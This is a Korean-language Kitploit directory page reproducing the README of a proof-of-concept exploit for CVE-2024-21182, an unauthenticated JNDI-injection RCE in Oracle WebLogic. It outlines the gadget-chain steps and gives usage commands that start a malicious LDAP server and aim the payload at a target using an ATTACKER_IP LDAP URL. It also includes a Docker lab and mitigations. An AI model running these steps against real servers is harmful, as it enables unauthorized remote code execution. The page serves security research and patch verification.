Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-21182---Oracle-WebLogic-Server-JNDI-Injection-RCE — CVE-2024-21182에 대한 개념 증명 익스플로잇으로, Oracle WebLogic Server에서 T3/IIOP 프로토콜을 통해 인증되지 않은 JNDI 주입으로 원격 코드 실행이 가능합니다. 테스트용 Docker 랩을 포함합니다. | Kitploit
도구/GitHubGitHub/fevar54/cve-2024-21182---oracle-weblogic-server-jndi-injection-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload DevelopmentLabs & Practice
GitHubfevar54/cve-2024-21182---oracle-weblogic-server-jndi-injection-rce

CVE-2024-21182---Oracle-WebLogic-Server-JNDI-Injection-RCE

CVE-2024-21182에 대한 개념 증명 익스플로잇으로, Oracle WebLogic Server에서 T3/IIOP 프로토콜을 통해 인증되지 않은 JNDI 주입으로 원격 코드 실행이 가능합니다. 테스트용 Docker 랩을 포함합니다.

저장소 보기
23개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-21182 - Oracle WebLogic Server JNDI Injection → RCE

CVE-2024-21182 - Oracle WebLogic Server JNDI Injection → RCE

CVE-2024-21182 CVSS CISA KEV

📋 설명

CVE-2024-21182는 Oracle WebLogic Server의 Core 구성 요소에 영향을 미치는 인증되지 않은 JNDI 인젝션 취약점입니다. 공격자가 T3 또는 IIOP 프로토콜을 통해 원격으로 임의 코드를 실행(RCE)할 수 있으며, 서버의 모든 데이터에 대한 완전한 접근 권한을 얻을 수 있습니다[citation:5][citation:8][citation:9].

이 저장소는 AggregatableOpaqueReference + MessageDestinationReference 가젯 체인을 이용하여 CVE-2023-21839 패치를 우회한 성공적인 개념 증명(PoC) 코드를 포함합니다[citation:2][citation:4].

🚨 취약점 세부 정보

속성값
CVECVE-2024-21182
제품Oracle WebLogic Server (Core)
영향받는 버전12.2.1.4.0 및 14.1.1.0.0[citation:7]
사용 가능한 패치Oracle Critical Patch Update (2024년 7월 및 2024년 10월)[citation:6]
CISA KEV 상태활성 익스플로잇 확인됨 (2026/01/06 추가)[citation:3][citation:8]
CISA 완료 기한2026/06/04[citation:8]

공격 벡터

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

  • 네트워크 (AV:N): 원격으로 익스플로잇 가능
  • 낮은 복잡성 (AC:L): 특별한 조건 불필요
  • 인증 불필요 (PR:N): 익명 접근
  • 사용자 상호작용 없음 (UI:N): 수동적 익스플로잇

⚙️ 공격 단계

1단계: 정찰: T3/IIOP 포트(7001)가 노출된 WebLogic 서버 식별.

2단계: 분석: 서버가 취약한 버전(12.2.1.4.0 또는 14.1.1.0.0)을 실행 중이거나 2024년 10월 패치가 적용되지 않았는지 확인.

3단계: 익스플로잇 (기술적 흐름):

  1. 가젯 구성: 공격자는 AggregatableOpaqueReference 객체를 생성합니다[citation:2].
  2. 참조 인젝션: 리플렉션(Java)을 사용하여 위 객체의 비공개 필드 referent를 악성 MessageDestinationReference를 가리키도록 수정합니다[citation:4].
  3. 바인드 및 룩업: 악성 객체를 서버의 JNDI 트리에 "연결(bind)"한 후 "검색(lookup)"합니다.
  4. JNDI 해석: 객체를 검색할 때 서버는 공격자가 제어하는 URL(LDAP 서버)에 대해 새로운 JNDI 쿼리를 실행합니다.
  5. LDAP 서버: 공격자의 HTTP 서버에 호스팅된 Java 코드에 대한 참조로 응답합니다.
  6. 코드 실행: WebLogic 서버가 Java 클래스를 다운로드하여 인스턴스화하고, 피해 머신 컨텍스트에서 해당 내용을 실행합니다.

🛠️ 사전 요구 사항

  • Docker 및 Docker Compose: 격리된 테스트 환경을 위해[citation:2].
  • JDK 8 이상: T3 클라이언트를 컴파일하고 실행하기 위해.
  • WebLogic T3 클라이언트: wlthint3client.jar (WebLogic 설치에서 추출 가능).

🚀 PoC 사용법

Docker 실습 환경

root@kitploit:~
# 1. 저장소 클론
git clone https://github.com/tu-usuario/CVE-2024-21182.git
cd CVE-2024-21182

# 2. 실습 환경 시작 (피해자 + 공격자)
docker-compose up -d

# 3. 자동 익스플로잇 실행
./validate.sh

승인된 실제 대상에 대한 익스플로잇

root@kitploit:~
# 1. 악성 LDAP/HTTP 서버 시작
python3 exploit/ldap_server.py

# 2. 다른 터미널에서 Java 페이로드 실행
javac -cp ".:wlthint3client.jar" poc/CVE_2024_21182.java
java -cp ".:wlthint3client.jar" CVE_2024_21182 t3://<TARGET_IP>:7001 ldap://<ATTACKER_IP>:1389/Evil

📊 입증된 영향

  • 서버에서의 원격 명령 실행 (RCE)
  • 애플리케이션 중요 데이터에 대한 무단 접근
  • 애플리케이션 서버 완전 장악
  • 기업 네트워크 측면 이동을 위한 잠재적 진입점
  • 랜섬웨어 또는 기타 악성 페이로드 배포 기반

현재 CISA 상태: "랜섬웨어 캠페인에 사용되는 것으로 알려짐? 알 수 없음" (그러나 일반적으로 미들웨어 RCE는 랜섬웨어 침입의 초기 벡터입니다).

🛡️ 완화 조치

  • 즉시 패치 적용: Oracle 2024년 10월 Critical Patch Update 또는 이후 버전 적용.
  • 네트워크 제한: T3/IIOP 포트(예: 7001)에 대한 접근을 신뢰할 수 있는 출처로만 차단/제한.
  • 모니터링: JNDI 트리에서 비정상적인 바인드/룩업 시도 탐지.

⚠️ 법적 고지

이 코드는 교육 및 연구 목적으로만 제공됩니다. 명시적 허가 없이 시스템에 이 PoC를 오용하는 것은 불법입니다. 저자는 이 정보의 오용에 대해 책임을 지지 않습니다.

📚 참고 자료

  • NVD - CVE-2024-21182
  • CISA KEV 카탈로그
  • Oracle 보안 권고
  • 원본 기술 분석

🤝 크레딧

가젯 체인을 발견한 원본 연구자

  • dinosn (Docker 기반 재현 가능한 실습 환경)
도구 다운로드